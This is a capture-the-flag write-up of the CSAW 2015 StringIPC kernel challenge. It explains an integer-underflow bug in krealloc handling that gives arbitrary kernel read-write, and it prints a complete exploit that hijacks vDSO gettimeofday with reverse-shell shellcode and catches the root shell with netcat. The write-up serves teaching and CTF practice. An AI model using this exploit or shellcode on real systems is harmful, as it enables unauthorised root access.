Select Page

Playing with vDSO!


Each team was presented with unprivileged access to a Digital Ocean droplet running 64-bit Ubuntu 14.04.3 LTS.  The vulnerable kernel module StringIPC.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag.

CSAW CTF 2015 Kernel Exploitation Challenge

This is a kernel PWN (500 pt) challenge. KASLR, SMEP and SMAP were enabled. Only the source code of a vulnerable LKM was provided, which you can download here. I solved this challenge together with @kaanezder.


According to the challenge author, Michael Coppola,

StringIPC is a kernel module providing a terrible IPC interface allowing processes to pass strings to one another.

CSAW CTF 2015 Kernel Exploitation Challenge

By issuing ioctl() calls on /dev/csaw, we can:

  • Allocate a new IPC channel;
  • Open an existing IPC channel;
  • Resize an IPC channel;
  • Read from/Write to an IPC channel;
  • Set/Get “where we are” inside an IPC channel buffer (just like fseek() does);
  • Close an IPC channel.

The vulnerability resides in the resizing function (namely CSAW_GROW_CHANNEL and CSAW_SHRINK_CHANNEL). Let’s take a closer look at it:

static int realloc_ipc_channel ( struct ipc_state *state, int id, size_t size, int grow )
{
    struct ipc_channel *channel;
    size_t new_size;
    char *new_data;

    channel = get_channel_by_id(state, id);
    if ( IS_ERR(channel) )
        return PTR_ERR(channel);

    if ( grow )
        new_size = channel->buf_size + size;
    else
        new_size = channel->buf_size - size;

    new_data = krealloc(channel->data, new_size + 1, GFP_KERNEL);
    if ( new_data == NULL )
        return -EINVAL;

    channel->data = new_data;
    channel->buf_size = new_size;

    ipc_channel_put(state, channel);

    return 0;
}

krealloc() is defined in mm/slab_common.c:

/**
 * krealloc - reallocate memory. The contents will remain unchanged.
 * @p: object to reallocate memory for.
 * @new_size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * The contents of the object pointed to are preserved up to the
 * lesser of the new and old sizes.  If @p is %NULL, krealloc()
 * behaves exactly like kmalloc().  If @new_size is 0 and @p is not a
 * %NULL pointer, the object pointed to is freed.
 */
void *krealloc(const void *p, size_t new_size, gfp_t flags)
{
	void *ret;

	if (unlikely(!new_size)) {
		kfree(p);
		return ZERO_SIZE_PTR;
	}

	ret = __do_krealloc(p, new_size, flags);
	if (ret && p != ret)
		kfree(p);

	return ret;
}
EXPORT_SYMBOL(krealloc);

As we can see, when new_size is zero, krealloc() returns ZERO_SIZE_PTR (defined in include/linux/slab.h):

/*
 * ZERO_SIZE_PTR will be returned for zero sized kmalloc requests.
 *
 * Dereferencing ZERO_SIZE_PTR will lead to a distinct access fault.
 *
 * ZERO_SIZE_PTR can be passed to kfree though in the same way that NULL can.
 * Both make kfree a no-op.
 */
#define ZERO_SIZE_PTR ((void *)16)

However, realloc_ipc_channel() rejects a resizing request only when krealloc() returns NULL (see line 181). Therefore, by setting new_size to -1, we get a channel with infinite (0xffffffffffffffff, since buf_size is defined as unsigned) size. Arbitrary read-write!


Now, how to get root? Of course, one way to do that is to overwrite our struct cred directly. This time, however, I would like to try a different way, namely hijacking vDSO.

First of all, what is vDSO? I’m sure you’ve seen it when using vmmap in your favorite GDB plugin:

gef➤ vmmap vdso
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x  [vdso]

Hmm…Let’s dump it out:

gef➤ dump binary memory vdso.dump 0x00007ffff7ffa000 0x00007ffff7ffc000
gef➤ quit
peilin@PWN:~/expr/vdso$ file vdso.dump
vdso.dump: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e34da8d8d1df68c59ef4339cbfc9dc8d24316724, stripped

Oh my, it’s an ELF binary!

peilin@PWN:~/expr/vdso$ readelf -s vdso.dump | grep “__vdso_”
     3: 0000000000000c60   333 FUNC    GLOBAL DEFAULT   12 __vdso_gettimeofday@@LINUX_2.6
     5: 0000000000000db0    21 FUNC    GLOBAL DEFAULT   12 __vdso_time@@LINUX_2.6
     7: 0000000000000a10   582 FUNC    GLOBAL DEFAULT   12 __vdso_clock_gettime@@LINUX_2.6
     9: 0000000000000dd0    42 FUNC    GLOBAL DEFAULT   12 __vdso_getcpu@@LINUX_2.6

According to Wikipedia:

vDSO (virtual dynamic shared object) is a Linux kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

vDSO – Wikipedia

Roughly speaking, vDSO is an ELF binary embedded in the kernel image, containing several heavily-used, time-critical kernel routines. When creating a user process, the kernel also maps vDSO into its address space, so that the user program can call, say, gettimeofday(), as if it was a LIBC function – No need to make a slow system call anymore!


Back to our attack. Here’s the plan:

  • Using our arbitrary read ability, we find out where is vDSO within the randomized kernel address space;
  • Using our arbitrary write ability, we overwrite gettimeofday() with a reverse shellcode;
  • We wait until a process running with root privilege call gettimeofday();
  • We catch that reverse root shell!

vDSO is page-aligned. I decided to locate it by searching for the __vdso_gettimeofday string.

Don’t forget vDSO is also readable from user space. Let’s first dump it out:

#include <fcntl.h>
#include <stdio.h>
#include <sys/auxv.h> 
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(void)
{
	unsigned long vdso = getauxval(AT_SYSINFO_EHDR);

	if (vdso != 0) {
		for (int i = 0; i < 0x2000; i++)
			printf("%02x ", *(unsigned char *)(vdso + i));
	}
	return 0;
}

Then:

peilin@PWN:~/csaw-finals-2015/stringipc$ xxd -r -p vdso.dump vdso.bin
peilin@PWN:~/csaw-finals-2015/stringipc$ file vdso.bin
vdso.bin: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=b7acc30c6c7414a0d4eb6b8645e633acfc0eae6a, stripped
peilin@PWN:~/csaw-finals-2015/stringipc$ strings -t x vdso.bin | grep “__vdso_gettimeofday”
    2c6 __vdso_gettimeofday

Now we know that we can find the string at offset 0x2c6

gef➤ p __vdso_gettimeofday
$1 = {<text variable, no debug info>} 0xc80 <gettimeofday>

…and we should write our shellcode to offset 0xc80.

This shellcode drops off a reverse shell at localhost:3333 if run with root privilege.


Here’s the full exploit:

/* musl-gcc exp.c -o exp -static */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE + 1
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE + 3
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE + 5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE + 6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE + 7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE + 8

#define SEEK_SET	0

typedef unsigned long loff_t;

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

int main(void)
{
    unsigned long r;
    int fd = open("/dev/csaw", O_RDWR);

    if (fd < 0) {
	    fprintf(stderr, "failed to open %s: %d\n", "/dev/csaw", fd);
	    exit(1);
    }

    /* alloc channel */
    struct alloc_channel_args alloc_channel;
    alloc_channel.buf_size = 0x2000;
    ioctl(fd, CSAW_ALLOC_CHANNEL, &alloc_channel);
    int id = alloc_channel.id;
    printf("[+] channel id: %d\n", id);

    /* grow channel */
    struct grow_channel_args grow_channel;
    grow_channel.id = id;
    grow_channel.size = 0xffffffffffffffff - alloc_channel.buf_size;
    ioctl(fd, CSAW_GROW_CHANNEL, &grow_channel);

    /* leak vdso */
    struct seek_channel_args seek_channel;
    seek_channel.id = id;
    seek_channel.whence = SEEK_SET;

    struct read_channel_args read_channel;
    char *buf = (char *)malloc(alloc_channel.buf_size);
    memset((void *)buf, 0, alloc_channel.buf_size);
    read_channel.id = alloc_channel.id;
    read_channel.buf = buf;
    read_channel.count = 0x2000;

    unsigned long vdso = 0xffffffff81000000;

    for (; vdso < 0xffffffffffffefff; vdso += 0x1000) {
        /* seek channel */
        seek_channel.index = vdso - 0x10;  /* channel->data is now 0x10 */
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        /* read channel */
        ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
        if (!strcmp(buf + 0x2c6, "__vdso_gettimeofday")) {
            printf("[+] kernel vDSO address: %p\n", (void *)vdso);
            break;
	    }
    }

    /*
     * https://gist.github.com/itsZN/1ab36391d1849f15b785
     * reverse shell (127.0.0.1:3333)
     */
    char shellcode[] = "\x90\x53\x48\x31\xC0\xB0\x66\x0F\x05\x48\x31\xDB\x48\x39\xC3\x75\x0F\x48\x31\xC0\xB0\x39\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x09\x5B\x48\x31\xC0\xB0\x60\x0F\x05\xC3\x48\x31\xD2\x6A\x01\x5E\x6A\x02\x5F\x6A\x29\x58\x0F\x05\x48\x97\x50\x48\xB9\xFD\xFF\xF2\xFA\x80\xFF\xFF\xFE\x48\xF7\xD1\x51\x48\x89\xE6\x6A\x10\x5A\x6A\x2A\x58\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x07\x48\x31\xC0\xB0\xE7\x0F\x05\x90\x6A\x03\x5E\x6A\x21\x58\x48\xFF\xCE\x0F\x05\x75\xF6\x48\x31\xC0\x50\x48\xBB\xD0\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xD3\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\x48\x31\xD2\xB0\x3B\x0F\x05\x48\x31\xC0\xB0\xE7\x0F\x05";

    /* write shellcode to __vdso_gettimeofday */
    seek_channel.index = vdso - 0x10 + 0xc80;    /* again, channel->data is now 0x10 */
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    struct write_channel_args write_channel;
    write_channel.id = id;
    write_channel.buf = shellcode;
    write_channel.count = sizeof(shellcode);
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);

    /* catch that shell! */
    pid_t pid = fork();
    if (pid == 0) {
        printf("[+] waiting for reverse shell...\n");
        system("nc -lp 3333");
    }
    wait(NULL);

    /* clean up */
    struct close_channel_args close_channel;
    close_channel.id = id;
    ioctl(fd, CSAW_CLOSE_CHANNEL, &close_channel);
    close(fd);
    return 0;
}

Let’s see:

/ $ ./exp
[+] channel id: 1
[+] kernel vDSO address: 0xffffffff83a04000
[+] waiting for reverse shell…
id
uid=0(root) gid=0(root)
whoami
root

Nice!

Note that you may need to simulate your own “cronjob” which constantly calls gettimeofday() in root privilege.


One last thing. A keen reader may ask: Why can’t we just modify vDSO from user space? For example, consider the following program:

/* musl-gcc -o crash -Wl,-znow crash.c */
#include <sys/auxv.h>
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <sys/time.h>

int main(void) {
    struct timeval tv;
    void *vdso = (void *)getauxval(AT_SYSINFO_EHDR);

    printf("vdso: %p\n", vdso);
    mprotect(vdso, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC);
    memset(vdso, 0, 0x2000);

    gettimeofday(&tv, 0);
    printf("tv_sec: %ld\n", tv.tv_sec);
    printf("tv_usec: %ld\n", tv.tv_usec);
    return 0;
}

It mprotect()s vDSO to writable, memset()s it to all zeroes, then calls gettimeofday(). Let’s see what happens:

peilin@PWN:~/expr/vdso$ ./crash
vdso: 0x7ffc03d71000
Segmentation fault

Of course it crashes – gettimeofday() is now all zeroes!

The question is: Why doing this does not affect other processes running on my machine?

Using a program borrowed from this article, I printed out the physical address of vDSO before and after memset():

root@PWN:/home/peilin/expr/vdso# ./phys 2664 0x7ffff7ffa000
getting page number of virtual address 140737354113024 of process 2664
opening pagemap /proc/2664/pagemap
moving to 274877644752
physical frame address is 0x111cb
physical address is 0x111cb000
root@PWN:/home/peilin/expr/vdso# ./phys 2664 0x7ffff7ffa000
getting page number of virtual address 140737354113024 of process 2664
opening pagemap /proc/2664/pagemap
moving to 274877644752
physical frame address is 0x2783b
physical address is 0x2783b000

It changed! This means all we did was memset()ting our own copy of vDSO to all zeroes, not the real one. It seems that mprotect()ing vDSO to writable makes it COW

In short, we can’t just write our shellcode to vDSO from user space and hope to get a root shell. Not that easy! 🙂


References: